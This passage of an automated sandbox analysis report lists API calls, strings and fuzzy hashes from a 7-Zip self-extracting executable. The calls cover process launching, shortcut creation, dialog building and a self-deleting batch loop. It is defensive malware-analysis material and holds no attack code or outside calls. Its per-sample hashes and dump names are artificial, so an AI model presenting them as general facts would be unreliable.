                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 0040557D
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 00405585
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 0040558D
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 00405595
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000), ref: 0040559D
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 004055A5
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 004055AD
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004055B5
                                                                                                                                                                                                                                          • GetStartupInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004055CE
                                                                                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,01000004,00000000,00000044,?), ref: 004055F5
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 004055FF
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040560A
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405612
                                                                                                                                                                                                                                          • CreateJobObjectW.KERNEL32(00000000,00000000), ref: 00405627
                                                                                                                                                                                                                                          • AssignProcessToJobObject.KERNEL32(00000000,?), ref: 0040563E
                                                                                                                                                                                                                                          • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0040564E
                                                                                                                                                                                                                                          • SetInformationJobObject.KERNEL32(?,00000007,?,00000008), ref: 0040566F
                                                                                                                                                                                                                                          • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405678
                                                                                                                                                                                                                                          • GetQueuedCompletionStatus.KERNEL32(00000000,?,?,?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 00405697
                                                                                                                                                                                                                                          • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004056A0
                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 004056A7
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004056B6
                                                                                                                                                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 004056BF
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 004056CA
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 004056D6
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004056DD
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004056E8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@$CloseHandleObject$CreateProcess$CompletionErrorLastResumeThread$AssignCodeCommandExitInfoInformationLinePortQueuedSingleStartupStatusWait
                                                                                                                                                                                                                                          • String ID: " -$sfxwaitall
                                                                                                                                                                                                                                          • API String ID: 2734624574-3991362806
                                                                                                                                                                                                                                          • Opcode ID: c2e281962814c2bd4c040bf537fa2d9b9fa3379860e294df17422ee88ae54ba2
                                                                                                                                                                                                                                          • Instruction ID: 96b1f86dbfc8e56d759c45ddf3715b356338dee30da8fd38d33b0e85c5ab07db
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2e281962814c2bd4c040bf537fa2d9b9fa3379860e294df17422ee88ae54ba2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F66151B2801108BBDF11AFA2DC45DDF3B7DFF48314F004536F915A21A1EB3A99549B69
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _wtol.MSVCRT ref: 00403B78
                                                                                                                                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,0041EA00,00000000,0041E9F4), ref: 00403C1B
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00403C8C
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 00403C94
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00403C9C
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00403CA4
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00403CAC
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00403CB4
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403CBC
                                                                                                                                                                                                                                          • _wtol.MSVCRT ref: 00403D12
                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(0041C454,00000000,00000001,0041C414,[@,.lnk,?,0000005C), ref: 00403DB3
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 00403E4B
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 00403E53
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 00403E5B
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 00403E63
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 00403E6B
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 00403E73
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 00403E7B
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 00403E81
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 00403E89
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                                                                                                                                                                                                                          • String ID: .lnk$[@
                                                                                                                                                                                                                                          • API String ID: 408529070-3575931549
                                                                                                                                                                                                                                          • Opcode ID: bf0e8a7df910328bb8376132718844ce6bb33e016dc20b09a56e47b2bf9c17d8
                                                                                                                                                                                                                                          • Instruction ID: 946a9f5c9c0093345211e4afafb7f9b8cfdd3f629f77b347e180bd11e348c725
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf0e8a7df910328bb8376132718844ce6bb33e016dc20b09a56e47b2bf9c17d8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57A16E75810108ABCF15EFA1CC969EEBB7DFF19306F50442AF402B61A1EB399E41CB58
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _wtol.MSVCRT ref: 004050E7
                                                                                                                                                                                                                                          • _wtol.MSVCRT ref: 00405103
                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(00000000,0041B810,?,?,?,?,?,?,?,?,?,?,?,?,?,004062C4), ref: 00404FEA
                                                                                                                                                                                                                                            • Part of subcall function 0040247D: GetLastError.KERNEL32(00000000,?,?), ref: 004024CC
                                                                                                                                                                                                                                            • Part of subcall function 0040247D: wsprintfW.USER32 ref: 004024DD
                                                                                                                                                                                                                                            • Part of subcall function 0040247D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004024F2
                                                                                                                                                                                                                                            • Part of subcall function 0040247D: GetLastError.KERNEL32 ref: 004024F7
                                                                                                                                                                                                                                            • Part of subcall function 0040247D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402512
                                                                                                                                                                                                                                            • Part of subcall function 0040247D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402525
                                                                                                                                                                                                                                            • Part of subcall function 0040247D: GetLastError.KERNEL32 ref: 0040252C
                                                                                                                                                                                                                                            • Part of subcall function 0040247D: lstrcmpiW.KERNEL32(00000000,?), ref: 00402541
                                                                                                                                                                                                                                            • Part of subcall function 0040247D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402551
                                                                                                                                                                                                                                            • Part of subcall function 0040247D: SetLastError.KERNEL32(00000003), ref: 00402578
                                                                                                                                                                                                                                            • Part of subcall function 0040247D: lstrlenA.KERNEL32(0041B328), ref: 004025AC
                                                                                                                                                                                                                                            • Part of subcall function 0040247D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004025C7
                                                                                                                                                                                                                                            • Part of subcall function 0040247D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 004025F9
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
                                                                                                                                                                                                                                          • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$PasswordText$PasswordTitle$Progress$Title$WarningTitle
                                                                                                                                                                                                                                          • API String ID: 2725485552-2157245290
                                                                                                                                                                                                                                          • Opcode ID: d0ccb95079a2c606f9a3c0ce682cef1d136eaf38159f665c4b074d3e10087a1f
                                                                                                                                                                                                                                          • Instruction ID: 66a2ce9ff7a2cb702224bd8f74ea761d5872454bbbc4643ec2785d60350ddd68
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0ccb95079a2c606f9a3c0ce682cef1d136eaf38159f665c4b074d3e10087a1f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC51D8F1E016007ADA216B275D4ADAF366CEB85704B28443BFD04F22D6E77C4A4046EF
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?,?,?), ref: 004057DA
                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040580B
                                                                                                                                                                                                                                          • WriteFile.KERNEL32(0041EA30,?,?,00407468,00000000,del ",:Repeat,00000000), ref: 004058C0
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 004058CB
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(0041EA30), ref: 004058D4
                                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00407468,00000000), ref: 004058EB
                                                                                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 004058FD
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405906
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405912
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00407468,?), ref: 00405918
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00407468,?,?,?,?,?,?,?,?,?,?,?,?,?,00407468,0041EA30), ref: 00405946
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                                                                                                                                                                                                                          • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                                                                                                                                                                                                                          • API String ID: 3007203151-3467708659
                                                                                                                                                                                                                                          • Opcode ID: 30920ae2f114942037667fcef3695092ebf7d87c0f31e60c9b52ff49f89ef857
                                                                                                                                                                                                                                          • Instruction ID: eb7ea14b5f0693ba8c6a98bcb421c9bec9bd01f197c59b95adb21b6866ed8523
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30920ae2f114942037667fcef3695092ebf7d87c0f31e60c9b52ff49f89ef857
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE413871800108AEDB11ABA5EC86DEF7B7DEF04724F50843AF511721E1EB795E85CB98
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetClassNameA.USER32(?,?,00000040), ref: 00403436
                                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(?,STATIC), ref: 00403449
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00403456
                                                                                                                                                                                                                                            • Part of subcall function 004033E0: GetWindowTextLengthW.USER32(?), ref: 004033F1
                                                                                                                                                                                                                                            • Part of subcall function 004033E0: GetWindowTextW.USER32(j4@,00000000,00000001), ref: 0040340E
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00403483
                                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00403491
                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(riched20), ref: 004034A5
                                                                                                                                                                                                                                          • GetMenu.USER32(?), ref: 004034B8
                                                                                                                                                                                                                                          • SetThreadLocale.KERNEL32(00000419), ref: 004034C5
                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,RichEdit20W,0041A584,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 004034F5
                                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 00403506
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 0040351B
                                                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 0040351F
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0040352D
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000461,?,?), ref: 00403558
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040355D
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00403565
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$??3@MessageSend$Text$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                                                                                                                                                                                                                          • String ID: RichEdit20W$STATIC$riched20${\rtf
                                                                                                                                                                                                                                          • API String ID: 3514532227-2281146334
                                                                                                                                                                                                                                          • Opcode ID: c286caa82b99ae390a7687983e8ee3eb06d76ab9f7170e9dcdb9ea0a05f1a152
                                                                                                                                                                                                                                          • Instruction ID: e5fea360a7eb9894b086cd4675cd9c6500acd79176ce5b6afcc660833785d9d0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c286caa82b99ae390a7687983e8ee3eb06d76ab9f7170e9dcdb9ea0a05f1a152
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67317F72901109BFDB01AFA5DC49EEF7BBCEB08705F10407AF604F6190DA799E518B6A
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00409240), ref: 00408E9F
                                                                                                                                                                                                                                          • LoadIconW.USER32(00000000), ref: 00408EA2
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000032), ref: 00408EB6
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000031), ref: 00408EBB
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00409240), ref: 00408EC4
                                                                                                                                                                                                                                          • LoadImageW.USER32(00000000), ref: 00408EC7
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 00408EE7
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408EF0
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000004B2), ref: 00408F0C
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000004B2), ref: 00408F16
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00408F22
                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F31
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000004B5), ref: 00408F3F
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000004B5), ref: 00408F4D
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00408F59
                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F68
                                                                                                                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 0040904E
                                                                                                                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 0040906A
                                                                                                                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00409082
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,00409240), ref: 004090E2
                                                                                                                                                                                                                                          • LoadIconW.USER32(00000000), ref: 004090E9
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000004B1), ref: 00409108
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000), ref: 0040910B
                                                                                                                                                                                                                                            • Part of subcall function 00408270: GetDlgItem.USER32(?,?), ref: 0040827A
                                                                                                                                                                                                                                            • Part of subcall function 00408270: GetWindowTextLengthW.USER32(00000000), ref: 00408281
                                                                                                                                                                                                                                            • Part of subcall function 0040793D: GetDlgItem.USER32(?,?), ref: 0040794A
                                                                                                                                                                                                                                            • Part of subcall function 0040793D: ShowWindow.USER32(00000000,?), ref: 00407961
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$Item$Long$HandleLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3694754696-0
                                                                                                                                                                                                                                          • Opcode ID: e6b773451116d13ff29ab79287a6f607863c90a398c86fb93464d41f8a12962b
                                                                                                                                                                                                                                          • Instruction ID: 99f397414dc97442f2ad5b2e660166812613d2f2543b201c56f9d92a48738ce2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6b773451116d13ff29ab79287a6f607863c90a398c86fb93464d41f8a12962b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B971E6703047056BEA216B21DD4AF2B3659EF84714F10443EF652BA2E3CFBDAC018A5E
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetWindowDC.USER32(00000000), ref: 004021B4
                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 004021C0
                                                                                                                                                                                                                                          • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 004021D9
                                                                                                                                                                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 00402208
                                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,00000003,00000002), ref: 00402213
                                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,00000003,00000002), ref: 0040221D
                                                                                                                                                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 0040222B
                                                                                                                                                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 00402232
                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00402240
                                                                                                                                                                                                                                          • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040224E
                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00402256
                                                                                                                                                                                                                                          • SetStretchBltMode.GDI32(00000000,00000004), ref: 0040225E
                                                                                                                                                                                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0040227D
                                                                                                                                                                                                                                          • GetCurrentObject.GDI32(00000000,00000007), ref: 00402286
                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00402293
                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00402299
                                                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 004022A2
                                                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 004022A5
                                                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,?), ref: 004022AC
                                                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,?), ref: 004022BB
                                                                                                                                                                                                                                          • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 004022C8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3462224810-0
                                                                                                                                                                                                                                          • Opcode ID: 3220a658d56a4ac9a5ca2fef4fc815231d73787dff14446d5a04d435e3e7e9ea
                                                                                                                                                                                                                                          • Instruction ID: 3b0073103a1e3377af01ca77c53c0656b208625dbf3d379900f4631a354f9c66
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3220a658d56a4ac9a5ca2fef4fc815231d73787dff14446d5a04d435e3e7e9ea
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB314A76D01208BFDF115FE19D48EEF7F79EB48760F108066FA04B61A0C6794A60EB66
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetClassNameA.USER32(?,?,00000040), ref: 004022E5
                                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(?,STATIC), ref: 004022FC
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0040230F
                                                                                                                                                                                                                                          • GetMenu.USER32(?), ref: 00402324
                                                                                                                                                                                                                                            • Part of subcall function 004020BF: GetModuleHandleW.KERNEL32(00000000), ref: 004020CA
                                                                                                                                                                                                                                            • Part of subcall function 004020BF: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 004020E7
                                                                                                                                                                                                                                            • Part of subcall function 004020BF: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 004020FB
                                                                                                                                                                                                                                            • Part of subcall function 004020BF: SizeofResource.KERNEL32(00000000,00000000), ref: 0040210C
                                                                                                                                                                                                                                            • Part of subcall function 004020BF: LoadResource.KERNEL32(00000000,00000000), ref: 00402116
                                                                                                                                                                                                                                            • Part of subcall function 004020BF: LockResource.KERNEL32(00000000), ref: 00402121
                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00402356
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000010), ref: 00402363
                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 0040236C
                                                                                                                                                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00402378
                                                                                                                                                                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,0041C434,?), ref: 0040239D
                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 004023AD
